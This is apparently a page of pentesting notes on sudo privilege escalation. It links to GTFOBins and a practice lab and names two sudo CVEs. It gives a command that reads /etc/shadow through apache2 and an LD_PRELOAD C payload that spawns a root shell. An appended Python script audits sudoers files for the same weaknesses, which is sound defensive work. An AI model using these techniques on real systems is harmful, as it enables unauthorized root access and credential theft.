coffeetohack
Sudo


Last updated 3 years ago


SUDO SHELL ESCAPING:

Use GTFOBins: https://gtfobins.github.io/

Practice: https://tryhackme.com/room/privescplayground

INTENDED FUNCTIONALITY:

When GTFOBins has no entry for the program, look for a feature of the program itself that can be abused. For example, if the program is apache2, search for: sudo apache2 privilege escalation

Some of these techniques won't give you a shell, but they can still let you view system files: the program prints an error that quotes the line it doesn't understand.

Ex: apache2, wget

sudo apache2 -f /etc/shadow

LD_PRELOAD:

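#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid(), setuid() */

/* Runs when the dynamic loader loads this shared object. Through sudo this
 * only happens if sudoers preserves LD_PRELOAD (env_keep). */
void _init() {
    unsetenv("LD_PRELOAD");   /* keep child processes from reloading the library */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}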

CVE-2019-14287: sudo 1.8.27

If we get (ALL, !root) /bin/bash from sudo -l

CVE-2019-18634:

Find sudo version using: sudo -V

If the version is 1.8.21p2 and password feedback is enabled

https://gtfobins.github.io/
https://tryhackme.com/room/privescplayground
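
A defensive check for the conditions this page relies on, as an added example (not code from the original page): it scans sudoers text for LD_PRELOAD kept via env_keep, the pwfeedback option, a (ALL, !root) runas spec, and sudo rules for the file-reading binaries named above. The sample sudoers content, finding labels and function names are constructed for illustration; env_keep and pwfeedback are the real sudoers option names.

```python
import re

# Constructed sudoers text for the demo (not taken from any real host).
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults env_keep += "LANG LD_PRELOAD"
Defaults pwfeedback
alice ALL=(ALL, !root) /bin/bash
bob   ALL=(root) NOPASSWD: /usr/sbin/apache2, \\
                 /usr/bin/wget
carol ALL=(root) /usr/bin/systemctl status nginx
"""

# Binaries this page names as able to leak file contents; extend as needed.
FILE_READ_BINARIES = {"apache2", "wget"}

def logical_lines(text):
    """Join backslash continuations; drop blanks and '#' lines (includes are not followed)."""
    joined = re.sub(r"\\\n\s*", " ", text)
    for raw in joined.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            yield line

def audit_sudoers(text):
    """Return sorted (finding, line) pairs for the conditions discussed on this page."""
    findings = []
    for line in logical_lines(text):
        if line.startswith("Defaults"):
            # LD_PRELOAD only survives sudo's environment reset if it is kept explicitly.
            if re.search(r"env_keep\s*\+?=.*\bLD_PRELOAD\b", line):
                findings.append(("env_keep-ld-preload", line))
            # "pwfeedback" enables password feedback; "!pwfeedback" disables it.
            if re.search(r"(?<![!\w])pwfeedback\b", line):
                findings.append(("pwfeedback-enabled", line))
            continue
        # Runas list of the form (ALL, !root): the pattern tied to CVE-2019-14287.
        runas = re.search(r"=\s*\(([^)]*)\)", line)
        if runas and re.search(r"\bALL\b", runas.group(1)) and "!root" in runas.group(1):
            findings.append(("runas-all-except-root", line))
        # Commands whose basename is a known file-reading binary.
        for path in re.findall(r"/[\w./-]+", line.split("=", 1)[-1]):
            if path.rsplit("/", 1)[-1] in FILE_READ_BINARIES:
                findings.append(("file-read-binary:" + path, line))
    return sorted(findings)

if __name__ == "__main__":
    for finding, line in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{finding:40} {line}")
```

Pair any finding with the installed version from sudo -V, since the two CVEs above only apply to affected sudo releases.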